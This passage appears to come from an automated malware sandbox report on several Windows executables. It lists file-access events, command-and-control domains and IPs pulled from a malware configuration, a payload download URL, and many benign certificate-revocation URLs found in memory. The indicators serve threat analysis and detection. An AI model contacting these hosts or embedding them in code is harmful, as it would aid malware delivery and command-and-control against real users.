                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior

                                      Networking

                                      barindex
                                      C2 URLs / IPs found in malware configuration
                                      Source: Malware configuration extractorURLs: codxefusion.top
                                      Source: Malware configuration extractorURLs: hardswarehub.today
                                      Source: Malware configuration extractorURLs: gadgethgfub.icu
                                      Source: Malware configuration extractorURLs: hardrwarehaven.run
                                      Source: Malware configuration extractorURLs: techmindzs.live
                                      Source: Malware configuration extractorURLs: quietswtreams.life
                                      Source: Malware configuration extractorURLs: techspherxe.top
                                      Source: Malware configuration extractorURLs: ctrlgem.xyz/gate.php
                                      Source: Malware configuration extractorIPs: 176.113.115.6
                                      Source: Joe Sandbox ViewIP Address: 176.113.115.7 176.113.115.7
                                      Source: Joe Sandbox ViewIP Address: 176.113.115.6 176.113.115.6
                                      Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
                                      Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_0095C3B0 InternetCloseHandle,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,Sleep,13_2_0095C3B0
                                      Source: trano1221.exe, 0000002A.00000002.1950520854.000001E16C380000.00000004.00001000.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1789766220.000001E16BCF7000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1779497201.000001E16BCF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
                                      Source: rapes.exe, 00000006.00000003.5645957689.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.php
                                      Source: powershell.exe, 00000019.00000002.1586419592.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1586419592.00000000049C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7
                                      Source: powershell.exe, 0000001D.00000002.4028270818.000001D880001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/mine/random.exe
                                      Source: futors.exe, 0000000F.00000003.1632617370.00000000014DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.209/Di0Her478/index.php
                                      Source: futors.exe, 0000000F.00000003.1632617370.00000000014DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.209/Di0Her478/index.php)
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.209/Di0Her478/index.php101
                                      Source: trano1221.exe, 00000023.00000003.1606270626.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
                                      Source: trano1221.exe, 00000023.00000003.1606270626.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digiD
                                      Source: trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
                                      Source: trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.coC
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1586024618.0000013C2C400000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C400000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                      Source: UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                                      Source: UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0K
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606270626.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585164780.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606270626.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585164780.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1586024618.0000013C2C400000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C400000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                      Source: trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1719891520.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1816650813.000001E16B9EC000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817319257.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806576447.000001E16BA95000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16B9B5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832695924.000001E16B9ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
                                      Source: trano1221.exe, 0000002A.00000003.1816650813.000001E16B9EC000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1717851242.000001E16BA15000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16B9B5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1880697620.000001E16B9F4000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1717851242.000001E16BA6C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832695924.000001E16B9ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577916/
                                      Source: trano1221.exe, 0000002A.00000003.1882675982.000001E16BAC9000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1884657596.000001E16C664000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1865956482.000001E16C661000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817319257.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806576447.000001E16BA95000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1885930845.000001E16BAC9000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1840930520.000001E16C65D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832985559.000001E16BAAE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1857007046.000001E16C65D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1838314051.000001E16C64F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1841513745.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1839236500.000001E16B56B000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1882867348.000001E16B56C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1828305886.000001E16BA84000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1813939975.000001E16B562000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1893387743.000001E16B56C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1946084154.000001E16BA86000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1816159571.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1942451950.000001E16B56C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                                      Source: trano1221.exe, 0000002A.00000002.1946800540.000001E16BB42000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1836411260.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1889974336.000001E16BA70000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1895673208.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1816159571.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
                                      Source: trano1221.exe, 0000002A.00000002.1946800540.000001E16BB42000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1895673208.000001E16BB41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crlk
                                      Source: trano1221.exe, 0000002A.00000003.1882675982.000001E16BAC9000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1884657596.000001E16C664000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1865956482.000001E16C661000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817319257.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806576447.000001E16BA95000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1885930845.000001E16BAC9000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1840930520.000001E16C65D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832985559.000001E16BAAE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1857007046.000001E16C65D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1838314051.000001E16C64F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1841513745.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
                                      Source: trano1221.exe, 0000002A.00000003.1882675982.000001E16BAC9000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817319257.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806576447.000001E16BA95000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1885930845.000001E16BAC9000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832985559.000001E16BAAE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1841513745.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crlf
                                      Source: powershell.exe, 00000019.00000002.1608019459.0000000007023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                                      Source: UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
                                      Source: trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1857506490.000001E16BB09000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806059046.000001E16BAE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
                                      Source: trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1857506490.000001E16BB09000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806059046.000001E16BAE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
                                      Source: trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1828305886.000001E16BA84000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1946084154.000001E16BA86000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1816159571.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1586024618.0000013C2C400000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C400000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
